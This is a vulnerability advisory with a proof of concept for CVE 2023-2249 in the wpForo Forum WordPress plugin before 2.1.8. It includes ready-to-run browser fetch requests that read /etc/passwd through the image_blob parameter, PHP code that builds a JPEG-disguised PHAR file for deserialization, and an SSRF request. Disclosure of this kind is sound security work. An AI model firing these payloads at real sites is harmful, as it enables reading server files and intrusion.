wpForo Forum < 2.1.8 – Subscriber+ Arbitrary File Read, Author+ PHAR Deserialization, and Subscriber+ Server-Side Request Forgery via file_get_contents | CVE 2023-2249

Description

The plugin does not validate some user input before passing it to `file_get_contents`. This leads to multiple vulnerabilities, including arbitrary file read, PHAR deserialization, and Server-Side Request Forgery.

Proof of Concept

Arbitrary File Read:

Perform the following `fetch` requests from the browser console:

    fetch('/wp-admin/admin-ajax.php?action=wpforo_profiles_default_cover_upload', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'image_blob=/etc/passwd' })

    fetch('/wp-content/uploads/wpforo/covers/profiles_custom_default_cover.jpg').then(response => response.text()).then(text => console.log(text))

---

PHAR Deserialization:

Please note that the following proof-of-concept requires WordPress to be running a PHP version previous to 8.0.

1. Create a PHAR file using the following PHP code in the `create_phar.php` file, and the command `php --define phar.readonly=0 create_phar.php`.

    <?php

    class Evil {}

    // create new Phar
    $phar = new Phar('poc.phar.jpg');
    $phar->startBuffering();
    $phar->addFromString('test.png', 'text');
    $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata(new Evil());
    $phar->stopBuffering();

2. As an Author user, upload the `poc.phar.jpg` file. Note its path on the server (e.g. `/wp-content/uploads/2023/04/poc.phar_.jpg`).

3. Create a simulated gadget on the server with the following code:

    class Evil {
      function __wakeup() {
        die('Arbitrary deserialization');
      }
    }

4. Trigger the deserialization with the following code in the browser console (with the correct path to the .phar file on your server):

fetch('/wp-admin/admin-ajax.php?action=wpforo_profiles_default_cover_upload', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'image_blob=phar://../wp-content/uploads/2023/04/poc.phar_.jpg' })

---

Server-Side Request Forgery:

1. Run the following code in the browser console:

    fetch('/wp-admin/admin-ajax.php?action=wpforo_profiles_default_cover_upload', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'image_blob=http://example.com/' })

2. Run the following code in the browser console to get the contents of the URL accessed above, which was fetched on the server-side:

    fetch('/wp-content/uploads/wpforo/covers/profiles_custom_default_cover.jpg').then(response => response.text()).then(text => console.log(text))